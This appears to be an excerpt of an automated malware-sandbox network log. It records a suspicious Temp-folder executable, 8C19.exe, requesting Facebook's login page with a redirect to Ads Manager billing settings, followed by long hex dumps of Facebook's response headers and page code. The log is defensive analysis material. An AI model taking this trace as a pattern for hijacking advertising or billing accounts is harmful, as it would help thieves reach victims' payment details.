                                                                                                                                  2022-10-17 20:07:24 UTC1626INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  14192.168.2.54971931.13.92.36443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-10-17 20:07:24 UTC1628OUTGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                  Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                  Host: www.facebook.com
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  viewport-width: 1920
                                                                                                                                  sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  sec-ch-prefers-color-scheme: light
                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                  2022-10-17 20:07:24 UTC1629INHTTP/1.1 200 OK
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                                                                  x-fb-rlafr: 0
                                                                                                                                  content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                                  2022-10-17 20:07:24 UTC1630INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb
                                                                                                                                  2022-10-17 20:07:24 UTC1632INData Raw: 63 65 34 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 30 4c 56 48 76 33 4b 58 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61
                                                                                                                                  Data Ascii: ce42<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="0LVHv3KX">function envFlush(a){function b(b){for(var c in a)b[c]=a
                                                                                                                                  2022-10-17 20:07:24 UTC1633INData Raw: 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2f 77 65 62 2f 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73
                                                                                                                                  Data Ascii: com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="shortcut icon" href="https
                                                                                                                                  2022-10-17 20:07:24 UTC1635INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 53 2f 6c 2f 30 2c 63 72 6f 73 73 2f 74 35 5a 54 68 7a 32 42 34 77 4e 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 4b 41 6a 62 72 6c 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 5f 2f 6c 2f 30 2c 63 72 6f 73 73 2f 76 63 50 71 54 69 52 77 49
                                                                                                                                  Data Ascii: ="https://static.xx.fbcdn.net/rsrc.php/v3/yS/l/0,cross/t5ZThz2B4wN.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="KAjbrl/" crossorigin="anonymous" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/y_/l/0,cross/vcPqTiRwI
                                                                                                                                  2022-10-17 20:07:24 UTC1636INData Raw: 34 30 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 62 77 69 7a 57 67 44 61 46 51 75 64 6d 70 33 73 22 7d 2c 22 31 31 36 37 33 39 34 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 42 70 4e 2d 74 6c 55 50 77 62 49 49 46 61 49 34 22 7d 2c 22 31 38 35 37 35 38 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 79 54 78 47 4d 70 36 6c 65 30 50 41 74 4d 62 73 22 7d 2c 22 32 37 37 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 45 75 32 34 34 57 49 63 65 37 69 77 71 32 51 55 22 7d 2c 22 33 37 35 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 65 53 35 55 54 6b
                                                                                                                                  Data Ascii: 40":{"result":false,"hash":"AT5bwizWgDaFQudmp3s"},"1167394":{"result":false,"hash":"AT7BpN-tlUPwbIIFaI4"},"1857581":{"result":false,"hash":"AT5yTxGMp6le0PAtMbs"},"2772":{"result":false,"hash":"AT5Eu244WIce7iwq2QU"},"3752":{"result":false,"hash":"AT6eS5UTk
                                                                                                                                  2022-10-17 20:07:24 UTC1638INData Raw: 67 22 2c 5b 5d 2c 7b 22 63 5f 75 73 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 63 70 70 6f 22 3a 7b 22 74 22 3a 38 36 34 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 64 70 72 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 63 69 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 63 73 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 73 74 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 53 74 72 69 63 74 22 7d 2c 22 69 5f 75 73 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 6c 6f 63 61 6c 65 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 6d 5f 6c
                                                                                                                                  Data Ascii: g",[],{"c_user":{"s":"None"},"cppo":{"t":86400,"s":"None"},"dpr":{"t":604800,"s":"None"},"fbl_ci":{"t":31536000,"s":"None"},"fbl_cs":{"t":31536000,"s":"None"},"fbl_st":{"t":31536000,"s":"Strict"},"i_user":{"s":"None"},"locale":{"t":604800,"s":"None"},"m_l
                                                                                                                                  2022-10-17 20:07:24 UTC1639INData Raw: 73 74 5f 62 61 73 65 5f 75 72 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 22 2c 22 6d 61 6e 69 66 65 73 74 5f 6f 72 69 67 69 6e 22 3a 6e 75 6c 6c 2c 22 62 65 5f 6f 6e 65 5f 61 68 65 61 64 22 3a 66 61 6c 73 65 2c 22 69 73 5f 72 74 6c 22 3a 66 61 6c 73 65 2c 22 69 73 5f 63 6f 6d 65 74 22 3a 66 61 6c 73 65 2c 22 69 73 5f 65 78 70 65 72 69 6d 65 6e 74 61 6c 5f 74 69 65 72 22 3a 66 61 6c 73 65 2c 22 69 73 5f 6a 69 74 5f 77 61 72 6d 65 64 5f 75 70 22 3a 74 72 75 65 2c 22 68 73 69 22 3a 22 37 31 35 35 35 37 35 34 37 37 34 31 37 35 38 32 36 32 38 22 2c 22 73 65 6d 72 5f 68 6f 73 74 5f 62 75 63 6b 65 74 22 3a 22 33 22 2c 22 62 6c 5f 68 61 73 68 5f 76 65 72 73 69 6f 6e 22 3a 32 2c 22 73 6b 69 70 5f 72 64 5f 62
                                                                                                                                  Data Ascii: st_base_uri":"https:\/\/static.xx.fbcdn.net","manifest_origin":null,"be_one_ahead":false,"is_rtl":false,"is_comet":false,"is_experimental_tier":false,"is_jit_warmed_up":true,"hsi":"7155575477417582628","semr_host_bucket":"3","bl_hash_version":2,"skip_rd_b
                                                                                                                                  2022-10-17 20:07:24 UTC1641INData Raw: 4e 45 53 53 5f 47 52 41 50 48 5f 53 45 54 54 49 4e 47 5f 57 41 42 41 5f 41 53 53 49 47 4e 45 44 5f 55 53 45 52 53 5f 4e 45 57 5f 41 50 49 22 2c 22 41 44 53 5f 50 4c 41 43 45 4d 45 4e 54 5f 46 49 58 5f 50 55 42 4c 49 53 48 45 52 5f 50 4c 41 54 46 4f 52 4d 53 5f 4d 55 54 41 54 49 4f 4e 22 2c 22 46 4f 52 43 45 5f 46 45 54 43 48 5f 42 4f 4f 53 54 45 44 5f 43 4f 4d 50 4f 4e 45 4e 54 5f 41 46 54 45 52 5f 41 44 53 5f 43 52 45 41 54 49 4f 4e 22 2c 22 56 49 44 45 4f 5f 44 49 4d 45 4e 53 49 4f 4e 53 5f 46 52 4f 4d 5f 50 4c 41 59 45 52 5f 49 4e 5f 55 50 4c 4f 41 44 5f 44 49 41 4c 4f 47 22 2c 22 53 4e 49 56 59 5f 47 52 4f 55 50 5f 42 59 5f 45 56 45 4e 54 5f 54 52 41 43 45 5f 49 44 5f 41 4e 44 5f 4e 41 4d 45 22 2c 22 41 44 53 5f 53 54 4f 52 45 5f 56 49 53 49 54 53 5f
                                                                                                                                  Data Ascii: NESS_GRAPH_SETTING_WABA_ASSIGNED_USERS_NEW_API","ADS_PLACEMENT_FIX_PUBLISHER_PLATFORMS_MUTATION","FORCE_FETCH_BOOSTED_COMPONENT_AFTER_ADS_CREATION","VIDEO_DIMENSIONS_FROM_PLAYER_IN_UPLOAD_DIALOG","SNIVY_GROUP_BY_EVENT_TRACE_ID_AND_NAME","ADS_STORE_VISITS_
                                                                                                                                  2022-10-17 20:07:24 UTC1642INData Raw: 74 6f 72 65 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 65 78 70 61 6e 64 6f 4b 65 79 22 3a 22 5f 5f 46 42 5f 53 54 4f 52 45 22 2c 22 75 73 65 45 78 70 61 6e 64 6f 22 3a 74 72 75 65 7d 2c 32 39 31 35 5d 2c 5b 22 43 6f 6f 6b 69 65 43 6f 72 65 4c 6f 67 67 69 6e 67 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 6d 61 78 69 6d 75 6d 49 67 6e 6f 72 61 62 6c 65 53 74 61 6c 6c 4d 73 22 3a 31 36 2e 36 37 2c 22 73 61 6d 70 6c 65 52 61 74 65 22 3a 39 2e 37 65 2d 35 2c 22 73 61 6d 70 6c 65 52 61 74 65 43 6c 61 73 73 69 63 22 3a 31 2e 30 65 2d 31 30 2c 22 73 61 6d 70 6c 65 52 61 74 65 46 61 73 74 53 74 61 6c 65 22 3a 31 2e 30 65 2d 38 7d 2c 33 34 30 31 5d 2c 5b 22 49 6d 6d 65 64 69 61 74 65 49 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 45 78 70 65 72 69 6d 65 6e 74 73 22 2c 5b 5d 2c
                                                                                                                                  Data Ascii: toreConfig",[],{"expandoKey":"__FB_STORE","useExpando":true},2915],["CookieCoreLoggingConfig",[],{"maximumIgnorableStallMs":16.67,"sampleRate":9.7e-5,"sampleRateClassic":1.0e-10,"sampleRateFastStale":1.0e-8},3401],["ImmediateImplementationExperiments",[],
                                                                                                                                  2022-10-17 20:07:24 UTC1643INData Raw: 66 65 4b 70 72 6c 55 55 4f 31 51 53 30 6f 45 71 5a 6f 79 65 22 2c 22 61 6c 6c 6f 77 6c 69 73 74 65 64 5f 69 66 72 61 6d 65 73 22 3a 5b 5d 7d 2c 35 35 34 30 5d 2c 5b 22 42 69 67 50 69 70 65 45 78 70 65 72 69 6d 65 6e 74 73 22 2c 5b 5d 2c 7b 22 6c 69 6e 6b 5f 69 6d 61 67 65 73 5f 74 6f 5f 70 61 67 65 6c 65 74 73 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 62 69 67 70 69 70 65 5f 70 6c 75 67 69 6e 73 22 3a 66 61 6c 73 65 7d 2c 39 30 37 5d 2c 5b 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 48 6f 6c 64 6f 75 74 22 2c 5b 5d 2c 7b 22 64 69 73 61 62 6c 65 5f 76 61 72 69 61 74 69 6f 6e 22 3a 66 61 6c 73 65 7d 2c 36 35 33 33 5d 2c 5b 22 41 73 79 6e 63 52 65 71 75 65 73 74 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 72 65 74 72 79 4f 6e 4e 65 74 77 6f 72 6b 45 72 72 6f
                                                                                                                                  Data Ascii: feKprlUUO1QS0oEqZoye","allowlisted_iframes":[]},5540],["BigPipeExperiments",[],{"link_images_to_pagelets":false,"enable_bigpipe_plugins":false},907],["IntlVariationHoldout",[],{"disable_variation":false},6533],["AsyncRequestConfig",[],{"retryOnNetworkErro
                                                                                                                                  2022-10-17 20:07:24 UTC1645INData Raw: 73 5f 61 6e 64 72 6f 69 64 2e 6a 73 6f 6e 22 3a 30 2c 22 5c 2f 63 6f 6e 6e 65 63 74 5c 2f 6a 73 64 69 61 6c 6f 67 5c 2f 4d 50 6c 61 74 66 6f 72 6d 41 70 70 49 6e 76 69 74 65 73 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 63 6f 6e 6e 65 63 74 5c 2f 6a 73 64 69 61 6c 6f 67 5c 2f 4d 50 6c 61 74 66 6f 72 6d 4f 41 75 74 68 53 68 69 6d 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 63 6f 6e 6e 65 63 74 5c 2f 6a 73 64 69 61 6c 6f 67 5c 2f 4d 50 6c 61 74 66 6f 72 6d 4c 69 6b 65 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 71 70 5c 2f 69 6e 74 65 72 73 74 69 74 69 61 6c 5c 2f 22 3a 31 2c 22 5c 2f 71 70 5c 2f 61 63 74 69 6f 6e 5c 2f 72 65 64 69 72 65 63 74 5c 2f 22 3a 31 2c 22 5c 2f 71 70 5c 2f 61 63 74 69 6f 6e 5c 2f 63 6c 6f 73 65 5c 2f 22 3a 31
                                                                                                                                  Data Ascii: s_android.json":0,"\/connect\/jsdialog\/MPlatformAppInvitesJSDialog\/":0,"\/connect\/jsdialog\/MPlatformOAuthShimJSDialog\/":0,"\/connect\/jsdialog\/MPlatformLikeJSDialog\/":0,"\/qp\/interstitial\/":1,"\/qp\/action\/redirect\/":1,"\/qp\/action\/close\/":1
                                                                                                                                  2022-10-17 20:07:24 UTC1646INData Raw: 65 72 5c 2f 22 3a 31 2c 22 5c 2f 63 72 2e 70 68 70 22 3a 31 2c 22 5c 2f 6c 65 67 61 6c 5c 2f 74 65 72 6d 73 5c 2f 22 3a 31 2c 22 5c 2f 6c 6f 67 69 6e 2e 70 68 70 22 3a 31 2c 22 5c 2f 6c 6f 67 69 6e 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 61 63 63 6f 75 6e 74 5c 2f 22 3a 31 2c 22 5c 2f 6e 5c 2f 22 3a 31 2c 22 5c 2f 72 65 6d 6f 74 65 5f 74 65 73 74 5f 64 65 76 69 63 65 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 63 6f 6e 66 69 72 6d 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 72 65 73 75 6c 74 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 70 72 6f 6d 6f 73 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 63 6f 6e 74 69 6e 75 65 5c 2f 22 3a 31 2c 22
                                                                                                                                  Data Ascii: er\/":1,"\/cr.php":1,"\/legal\/terms\/":1,"\/login.php":1,"\/login\/":1,"\/mobile\/account\/":1,"\/n\/":1,"\/remote_test_device\/":1,"\/upsell\/buy\/":1,"\/upsell\/buyconfirm\/":1,"\/upsell\/buyresult\/":1,"\/upsell\/promos\/":1,"\/upsell\/continue\/":1,"
                                                                                                                                  2022-10-17 20:07:24 UTC1648INData Raw: 75 72 6e 20 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 73 2e 4e 55 4d 42 45 52 5f 4f 54 48 45 52 3b 20 7d 22 7d 2c 33 34 30 35 5d 2c 5b 22 53 65 72 76 65 72 54 69 6d 65 44 61 74 61 22 2c 5b 5d 2c 7b 22 73 65 72 76 65 72 54 69 6d 65 22 3a 31 36 36 36 30 33 37 32 34 34 37 31 37 2c 22 74 69 6d 65 4f 66 52 65 71 75 65 73 74 53 74 61 72 74 22 3a 31 36 36 36 30 33 37 32 34 34 36 39 39 2e 36 2c 22 74 69 6d 65 4f 66 52 65 73 70 6f 6e 73 65 53 74 61 72 74 22 3a 31 36 36 36 30 33 37 32 34 34 36 39 39 2e 36 7d 2c 35 39 34 33 5d 2c 5b 22 46 62 74 51 54 4f 76 65 72 72 69 64 65 73 22 2c 5b 5d 2c 7b 22 6f 76 65 72 72 69 64 65 73 22 3a 7b 7d 7d 2c 35 35 31 5d 2c 5b 22 41 6e 61 6c 79 74 69 63 73 43 6f 72 65 44 61 74 61 22 2c 5b 5d 2c 7b 22 64 65 76 69 63 65 5f 69 64 22 3a 22
                                                                                                                                  Data Ascii: urn IntlVariations.NUMBER_OTHER; }"},3405],["ServerTimeData",[],{"serverTime":1666037244717,"timeOfRequestStart":1666037244699.6,"timeOfResponseStart":1666037244699.6},5943],["FbtQTOverrides",[],{"overrides":{}},551],["AnalyticsCoreData",[],{"device_id":"
                                                                                                                                  2022-10-17 20:07:24 UTC1649INData Raw: 5f 62 54 63 5a 49 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 38 39 36 34 36 32 22 2c 5b 22 73 65 74 49 6e 74 65 72 76 61 6c 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 73 65 74 49 6e 74 65 72 76 61 6c 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 2c 22 41 61 32 2d 70 6e 68 59 30 6a 7a 73 6b 38 59 47 58 57 4f 67 5f 72 6d 30 6b 34 61 79 57 76 44 2d 57 6a 51 4f 30 58 71 47 4b 4c 55 6d 76 63 42 5a 4b 42 35 73 64 36 46 57 56 44 59 62 5a 41 63 66 65 32 43 38 5a 37 6a 31 4f 73 34 58 68 68 36 44 32 6c 37 42 43 5f 62 54 63 5a 49 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 36 36 33 33 22 2c 5b 22 73 65 74 54 69 6d 65 6f 75 74 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22
                                                                                                                                  Data Ascii: _bTcZI"]},-1],["cr:896462",["setIntervalAcrossTransitionsBlue"],{"__rc":["setIntervalAcrossTransitionsBlue","Aa2-pnhY0jzsk8YGXWOg_rm0k4ayWvD-WjQO0XqGKLUmvcBZKB5sd6FWVDYbZAcfe2C8Z7j1Os4Xhh6D2l7BC_bTcZI"]},-1],["cr:986633",["setTimeoutAcrossTransitionsBlue"
                                                                                                                                  2022-10-17 20:07:24 UTC1651INData Raw: 73 65 6f 76 65 72 22 3a 31 30 30 30 30 2c 22 6d 6f 75 73 65 6f 75 74 22 3a 31 30 30 30 30 2c 22 6d 6f 75 73 65 77 68 65 65 6c 22 3a 31 2c 22 4d 53 50 6f 69 6e 74 65 72 4d 6f 76 65 22 3a 31 30 30 30 30 2c 22 6b 65 79 64 6f 77 6e 22 3a 30 2e 31 2c 22 63 6c 69 63 6b 22 3a 30 2e 30 32 2c 22 6d 6f 75 73 65 75 70 22 3a 30 2e 30 32 2c 22 5f 5f 31 30 30 6d 73 22 3a 30 2e 30 30 31 2c 22 5f 5f 64 65 66 61 75 6c 74 22 3a 35 30 30 30 2c 22 5f 5f 6d 69 6e 22 3a 31 30 30 2c 22 5f 5f 69 6e 74 65 72 61 63 74 69 6f 6e 44 65 66 61 75 6c 74 22 3a 32 30 30 2c 22 5f 5f 65 76 65 6e 74 44 65 66 61 75 6c 74 22 3a 31 30 30 30 30 30 7d 2c 22 70 61 67 65 5f 73 61 6d 70 6c 69 6e 67 5f 62 6f 6f 73 74 22 3a 31 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 5f 72 65 67 65 78 65 73 22 3a 7b 7d
                                                                                                                                  Data Ascii: seover":10000,"mouseout":10000,"mousewheel":1,"MSPointerMove":10000,"keydown":0.1,"click":0.02,"mouseup":0.02,"__100ms":0.001,"__default":5000,"__min":100,"__interactionDefault":200,"__eventDefault":100000},"page_sampling_boost":1,"interaction_regexes":{}
                                                                                                                                  2022-10-17 20:07:24 UTC1652INData Raw: 2d 20 5f 39 61 78 5f 20 5f 39 61 79 31 20 55 49 50 61 67 65 5f 4c 6f 67 67 65 64 4f 75 74 20 68 61 73 42 61 6e 6e 65 72 20 5f 2d 6b 62 20 5f 36 30 35 61 20 62 5f 63 33 70 79 6e 2d 61 68 68 20 63 68 72 6f 6d 65 20 77 65 62 6b 69 74 20 77 69 6e 20 78 31 20 4c 6f 63 61 6c 65 5f 65 6e 5f 55 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6e 6f 6e 63 65 3d 22 30 4c 56 48 76 33 4b 58 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 62 6f 6f 74 73 74 72 61 70 57 65 62 53 65 73 73 69 6f 6e 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6a 29 7b 6a 28 31 36 36 36 30 33 37 32 34 34 29 7d 29 3c 2f 73 63 72 69 70 74 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 6c 69 22 20 69 64 3d 22 75 5f 30 5f 30
